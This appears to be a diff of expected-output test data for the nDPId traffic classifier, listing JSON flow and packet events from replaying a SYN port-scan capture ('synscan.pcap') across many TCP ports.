-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1328,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1334,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1334,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1334,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1334,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5431,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5432,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5431,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5432,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056274,"flow_last_seen":1278275056274,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056274,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1278275056274,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056274,"pkt":"ACYLMQczACWzv5HuCABFAAAs5wgAADYGK2qsEAAIQA2GNIzSAbvdUoMYAAAAAGACDAAq1AAAAgQFtA=="} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"synscan.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"synscan.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAsWtAAAC4Gv6KsEAAIQA2GNIzSAI\/dUoMYAAAAAGACDAAsAAAAAgQFtA=="} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"synscan.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"synscan.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAsxSoAAC0GVkisEAAIQA2GNIzSDOrdUoMYAAAAAGACCAAjpQAAAgQFtA=="} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"synscan.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"synscan.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAsXg4AACoGwGSsEAAIQA2GNIzSAMfdUoMYAAAAAGACDAAryAAAAgQFtA=="} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"synscan.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"synscan.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAs72YAADQGJQysEAAIQA2GNIzSAG\/dUoMYAAAAAGACBAA0IAAAAgQFtA=="} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"synscan.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"synscan.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAsQzMAACsG2j+sEAAIQA2GNIzSBAHdUoMYAAAAAGACEAAkjgAAAgQFtA=="} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"synscan.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"synscan.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAsMnwAACwG6fasEAAIQA2GNIzSA+PdUoMYAAAAAGACBAAwrAAAAgQFtA=="} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"synscan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"synscan.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAs3nEAADAGOgGsEAAIQA2GNIzSAkvdUoMYAAAAAGACBAAyRAAAAgQFtA=="} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"synscan.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"synscan.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAspjUAADYGbD2sEAAIQA2GNIzSADXdUoMYAAAAAGACDAAsWgAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"synscan.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"synscan.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAsxrsAADgGSbesEAAIQA2GNIzSFwzdUoMYAAAAAGACBAAdgwAAAgQFtA=="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"synscan.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1278275056338,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1278275056338,"pkt":"ACWzv5HuACYLMQczCABFAAAsAABAADYG0nJADYY0rBAACAA1jNJCmj\/E3VKDGWASFtCfagAAAgQFZAAA"} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"synscan.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056340,"flow_last_seen":1278275056340,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056340,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"synscan.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1278275056340,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056340,"pkt":"ACYLMQczACWzv5HuCABFAAAsv+0AADcGUYWsEAAIQA2GNIzSABXdUoMYAAAAAGACEAAoegAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"synscan.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056340,"flow_last_seen":1278275056340,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056340,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"synscan.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1278275056340,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056340,"pkt":"ACYLMQczACWzv5HuCABFAAAsQrAAADsGysKsEAAIQA2GNIzSAHHdUoMYAAAAAGACEAAoHgAAAgQFtA=="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"synscan.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1278275056401,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1278275056401,"pkt":"ACWzv5HuACYLMQczCABFAAAoAABAADYG0nZADYY0rBAACABxjNKSwt+J3VKDGVAUAADdegAAAAAAAAAA"} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"synscan.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056403,"flow_last_seen":1278275056403,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056403,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"synscan.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1278275056403,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056403,"pkt":"ACYLMQczACWzv5HuCABFAAAstfQAACYGbH6sEAAIQA2GNIzSAFDdUoMYAAAAAGACDAAsPwAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"synscan.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056403,"flow_last_seen":1278275056403,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056403,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"synscan.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1278275056403,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056403,"pkt":"ACYLMQczACWzv5HuCABFAAAsT54AADAGyNSsEAAIQA2GNIzSAIvdUoMYAAAAAGACBAA0BAAAAgQFtA=="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"synscan.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1278275056464,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1278275056464,"pkt":"ACWzv5HuACYLMQczCABFAAAsAABAADYG0nJADYY0rBAACABQjNJ7XAKI3VKDGWASFtCjyQAAAgQFZAAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"synscan.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056466,"flow_last_seen":1278275056466,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056466,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"synscan.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1278275056466,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056466,"pkt":"ACYLMQczACWzv5HuCABFAAAsoqsAAC4Gd8esEAAIQA2GNIzSDT3dUoMYAAAAAGACDAAfUgAAAgQFtA=="} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"synscan.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056466,"flow_last_seen":1278275056466,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056466,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":23,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 